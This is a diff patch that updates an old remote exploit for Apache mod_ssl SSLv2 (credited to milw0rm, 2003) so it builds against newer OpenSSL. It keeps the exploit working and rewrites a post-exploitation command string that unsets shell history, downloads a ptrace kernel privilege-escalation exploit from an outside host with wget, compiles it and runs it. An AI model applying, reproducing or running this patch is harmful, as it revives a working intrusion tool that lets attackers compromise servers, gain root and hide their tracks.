23a24,33 > #include > #include > #define SSL2_MT_ERROR 0 > #define SSL2_MT_CLIENT_FINISHED 3 > #define SSL2_MT_SERVER_HELLO 4 > #define SSL2_MT_SERVER_VERIFY 5 > #define SSL2_MT_SERVER_FINISHED 6 > #define SSL2_MAX_CONNECTION_ID_LENGTH 16 > > 663c673 < #define COMMAND2 "unset HISTFILE; cd /tmp; wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n" --- > #define COMMAND2 "unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n" 961c971 < unsigned char *p, *end; --- > const unsigned char *p, *end; 1069c1079,1080 < if (pkey->type != EVP_PKEY_RSA) { --- > //if (pkey->type != EVP_PKEY_RSA) { > if (EVP_PKEY_get1_RSA(pkey) == NULL) { 1075c1086,1087 < encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], pkey->pkey.rsa, RSA_PKCS1_PADDING); --- > //encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], pkey->pkey.rsa, RSA_PKCS1_PADDING); > encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING); 1296c1308 < // milw0rm.com [2003-04-04] \ No newline at end of file --- > // milw0rm.com [2003-04-04]